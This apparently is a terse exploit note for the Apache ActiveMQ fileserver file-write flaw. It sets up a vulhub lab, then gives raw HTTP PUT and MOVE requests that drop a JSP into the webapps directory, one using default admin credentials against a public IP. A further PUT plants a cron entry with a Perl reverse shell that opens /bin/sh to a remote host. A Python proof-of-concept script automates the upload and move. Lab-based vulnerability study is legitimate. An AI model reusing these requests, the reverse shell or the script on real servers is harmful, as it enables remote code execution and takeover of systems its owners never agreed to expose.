UzzzzZ

sudo curl -L https://get.daocloud.io/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose

sudo chmod +x /usr/local/bin/docker-compose

git clone https://github.com/vulhub/vulhub.git

docker-compose up -d

find . -name "UzJu.txt"

PUT /fileserver/UzJu.txt HTTP/1.1
Host: ip:8161
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
If-Modified-Since: Fri, 13 Feb 2015 18:05:11 GMT
Connection: close
Content-Length: 15

UzJu_Test....:)

file:///opt/activemq/webapps/api/UzJu.jsp

MOVE /fileserver/UzJu.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/UzJu.jsp
Host: 106.52.5.116:8161
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=1kj9fz5gan2yd1wstqeinp6pkh
Connection: close

PUT /fileserver/time.txt HTTP/1.1
Host: ip:8161
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
If-Modified-Since: Fri, 13 Feb 2015 18:05:11 GMT
Connection: close
Content-Length: 241

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
@Project ：UzJuSecurityTools 
@File    ：2.ActiveMQFileWrite.py
@Author  ：UzJu
@Date    ：2021/12/27 10:26 下午 
@Email   ：UzJuer@163.com
'''

import requests


class ActiveMQFileWrite:
    def __init__(self, url, username, password):
        self.url = url
        self.poc = "UzJu_test"
        self.path = "/fileserver/UzJu_1.txt"
        self.username = username
        self.password = password

    def getUploadFile(self):
        result = requests.put(url=self.url + self.path,
                              data=self.poc)
        if result.status_code == 204:
            print(f"[+]WebShell-{self.poc}写入成功")
        else:
            print(f'[-]写入失败, 状态码:{result.status_code}')

    def getAndMoveFile(self):
        headers = {
            "Destination": "file:///opt/activemq/webapps/api/UzJu_1.jsp"
        }
        result = requests.request("MOVE",
                                  url=self.url + self.path,
                                  headers=headers)
        if result.status_code == 204:
            print(f"[+]文件移动成功，请访问,{self.url}/api/UzJu_1.jsp")
        else:
            print(f"[-]文件移动失败，状态码:{result.status_code}")

    def getCheckVuln(self):
        result = requests.get(url=self.url + "/api/UzJu_1.jsp",
                              auth=(self.username, self.password))
        if result.status_code == 200:
            print(f"[+]存在漏洞, Payload: {result.text}")
        else:
            print(f"[-]不存在漏洞，或文件上传失败，或其他原因")


if __name__ == '__main__':
    main = ActiveMQFileWrite('http://ip:8161', "admin", "admin")
    main.getUploadFile()
    main.getAndMoveFile()
    main.getCheckVuln()